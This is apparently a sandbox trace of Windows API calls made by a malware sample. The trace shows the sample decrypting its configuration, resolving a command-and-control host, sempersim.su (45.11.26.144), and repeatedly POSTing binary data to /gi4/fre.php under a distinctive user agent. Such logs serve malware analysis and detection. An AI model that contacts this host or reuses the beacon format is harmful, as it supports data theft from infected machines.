[0172.774] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b8e90 | out: hHeap=0x5b0000) returned 1 [0172.774] GetProcessHeap () returned 0x5b0000 [0172.774] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0172.774] GetProcessHeap () returned 0x5b0000 [0172.775] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0172.775] GetProcessHeap () returned 0x5b0000 [0172.775] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0172.775] closesocket (s=0x2c0) returned 0 [0172.776] GetProcessHeap () returned 0x5b0000 [0172.776] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9d0 | out: hHeap=0x5b0000) returned 1 [0172.776] GetProcessHeap () returned 0x5b0000 [0172.776] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0172.776] GetProcessHeap () returned 0x5b0000 [0172.776] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3350 | out: hHeap=0x5b0000) returned 1 [0172.777] GetProcessHeap () returned 0x5b0000 [0172.777] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0172.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1144) returned 0x2c0 [0172.779] Sleep (dwMilliseconds=0xea60) [0172.780] GetProcessHeap () returned 0x5b0000 [0172.780] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3110 [0172.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.782] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0172.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.788] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0172.795] GetProcessHeap () returned 0x5b0000 [0172.796] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0172.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.805] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0172.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.806] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0172.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.807] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.807] GetProcessHeap () returned 0x5b0000 [0172.808] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0172.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.809] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3110, pdwDataLen=0xdfcfc | out: pbData=0x5d3110, pdwDataLen=0xdfcfc) returned 1 [0172.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.810] CryptDestroyKey (hKey=0x5be048) returned 1 [0172.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.811] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0172.811] GetProcessHeap () returned 0x5b0000 [0172.811] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0172.811] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.812] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0172.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.843] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0172.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.844] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0172.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.845] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0172.845] GetProcessHeap () returned 0x5b0000 [0172.845] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0172.845] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0172.845] GetProcessHeap () returned 0x5b0000 [0172.846] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0172.846] GetProcessHeap () returned 0x5b0000 [0172.846] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0172.846] GetProcessHeap () returned 0x5b0000 [0172.846] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0172.846] GetProcessHeap () returned 0x5b0000 [0172.846] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0172.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.847] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0172.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.852] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5aa8) returned 1 [0172.858] GetProcessHeap () returned 0x5b0000 [0172.858] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8650 [0172.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.859] CryptImportKey (in: hProv=0x5c5aa8, pbData=0x5c8650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0172.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.867] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0172.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.867] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0172.867] GetProcessHeap () returned 0x5b0000 [0172.868] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8650 | out: hHeap=0x5b0000) returned 1 [0172.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.869] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0172.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.870] CryptDestroyKey (hKey=0x5bde08) returned 1 [0172.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0172.871] CryptReleaseContext (hProv=0x5c5aa8, dwFlags=0x0) returned 1 [0172.871] GetProcessHeap () returned 0x5b0000 [0172.871] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0172.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.872] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0172.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.872] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0172.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0172.873] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0172.873] GetProcessHeap () returned 0x5b0000 [0172.873] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0172.873] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0172.907] GetProcessHeap () returned 0x5b0000 [0172.907] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca950 [0172.907] socket (af=2, type=1, protocol=6) returned 0x2c4 [0172.907] connect (s=0x2c4, name=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0172.978] FreeAddrInfoW (pAddrInfo=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf428*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0172.978] GetProcessHeap () returned 0x5b0000 [0172.978] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5998 [0172.978] GetProcessHeap () returned 0x5b0000 [0172.978] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0172.979] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0172.980] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0172.980] GetProcessHeap () returned 0x5b0000 [0172.980] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0172.980] GetProcessHeap () returned 0x5b0000 [0172.980] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0172.980] GetProcessHeap () returned 0x5b0000 [0172.980] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d30c8 [0172.980] GetProcessHeap () returned 0x5b0000 [0172.980] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0172.981] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0172.982] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0172.982] GetProcessHeap () returned 0x5b0000 [0172.982] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5b8e90 [0172.982] GetProcessHeap () returned 0x5b0000 [0172.983] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0172.983] send (s=0x2c4, buf=0x5b8e90*, len=236, flags=0) returned 236 [0172.984] send (s=0x2c4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0172.984] GetProcessHeap () returned 0x5b0000 [0172.984] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0172.984] recv (in: s=0x2c4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0174.361] GetProcessHeap () returned 0x5b0000 [0174.362] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5b8e90 | out: hHeap=0x5b0000) returned 1 [0174.362] GetProcessHeap () returned 0x5b0000 [0174.362] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d30c8 | out: hHeap=0x5b0000) returned 1 [0174.362] GetProcessHeap () returned 0x5b0000 [0174.362] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0174.362] GetProcessHeap () returned 0x5b0000 [0174.363] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5998 | out: hHeap=0x5b0000) returned 1 [0174.363] closesocket (s=0x2c4) returned 0 [0174.364] GetProcessHeap () returned 0x5b0000 [0174.364] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca950 | out: hHeap=0x5b0000) returned 1 [0174.364] GetProcessHeap () returned 0x5b0000 [0174.364] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0174.364] GetProcessHeap () returned 0x5b0000 [0174.365] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0174.365] GetProcessHeap () returned 0x5b0000 [0174.365] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0174.365] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x864) returned 0x2c4 [0174.367] Sleep (dwMilliseconds=0xea60) [0174.374] GetProcessHeap () returned 0x5b0000 [0174.374] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3470 [0174.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.375] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0174.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.380] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0174.387] GetProcessHeap () returned 0x5b0000 [0174.387] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84d0 [0174.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.388] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c84d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0174.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.389] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0174.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.395] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.395] GetProcessHeap () returned 0x5b0000 [0174.396] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84d0 | out: hHeap=0x5b0000) returned 1 [0174.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.398] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3470, pdwDataLen=0xdfcfc | out: pbData=0x5d3470, pdwDataLen=0xdfcfc) returned 1 [0174.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.400] CryptDestroyKey (hKey=0x5be048) returned 1 [0174.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.402] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0174.403] GetProcessHeap () returned 0x5b0000 [0174.403] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0174.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.404] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0174.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.410] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0174.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.411] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0174.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.411] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0174.411] GetProcessHeap () returned 0x5b0000 [0174.411] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0174.412] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0174.412] GetProcessHeap () returned 0x5b0000 [0174.412] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0174.412] GetProcessHeap () returned 0x5b0000 [0174.413] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0174.413] GetProcessHeap () returned 0x5b0000 [0174.413] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3470 | out: hHeap=0x5b0000) returned 1 [0174.413] GetProcessHeap () returned 0x5b0000 [0174.413] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3308 [0174.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.414] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0174.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.420] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0174.429] GetProcessHeap () returned 0x5b0000 [0174.429] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0174.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.430] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be288) returned 1 [0174.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.431] CryptSetKeyParam (hKey=0x5be288, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0174.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.432] CryptSetKeyParam (hKey=0x5be288, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0174.432] GetProcessHeap () returned 0x5b0000 [0174.432] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0174.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.433] CryptDecrypt (in: hKey=0x5be288, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3308, pdwDataLen=0xdfcfc | out: pbData=0x5d3308, pdwDataLen=0xdfcfc) returned 1 [0174.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.434] CryptDestroyKey (hKey=0x5be288) returned 1 [0174.434] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0174.435] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0174.435] GetProcessHeap () returned 0x5b0000 [0174.435] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0174.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.435] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0174.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.436] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0174.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0174.441] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0174.441] GetProcessHeap () returned 0x5b0000 [0174.441] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0174.441] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0174.443] GetProcessHeap () returned 0x5b0000 [0174.443] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9c0 [0174.443] socket (af=2, type=1, protocol=6) returned 0x1f0 [0174.443] connect (s=0x1f0, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0174.512] FreeAddrInfoW (pAddrInfo=0x5cda98*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0174.512] GetProcessHeap () returned 0x5b0000 [0174.512] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5dd8 [0174.512] GetProcessHeap () returned 0x5b0000 [0174.512] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0174.513] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0174.514] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0174.514] GetProcessHeap () returned 0x5b0000 [0174.514] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0174.514] GetProcessHeap () returned 0x5b0000 [0174.515] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0174.516] GetProcessHeap () returned 0x5b0000 [0174.517] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3500 [0174.517] GetProcessHeap () returned 0x5b0000 [0174.517] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0174.517] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0174.518] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0174.518] GetProcessHeap () returned 0x5b0000 [0174.518] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0174.518] GetProcessHeap () returned 0x5b0000 [0174.519] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0174.519] send (s=0x1f0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0174.519] send (s=0x1f0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0174.519] GetProcessHeap () returned 0x5b0000 [0174.519] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0174.519] recv (in: s=0x1f0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0175.997] GetProcessHeap () returned 0x5b0000 [0175.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0175.998] GetProcessHeap () returned 0x5b0000 [0175.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0175.998] GetProcessHeap () returned 0x5b0000 [0175.999] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0175.999] GetProcessHeap () returned 0x5b0000 [0175.999] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0175.999] closesocket (s=0x1f0) returned 0 [0176.000] GetProcessHeap () returned 0x5b0000 [0176.000] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca9c0 | out: hHeap=0x5b0000) returned 1 [0176.000] 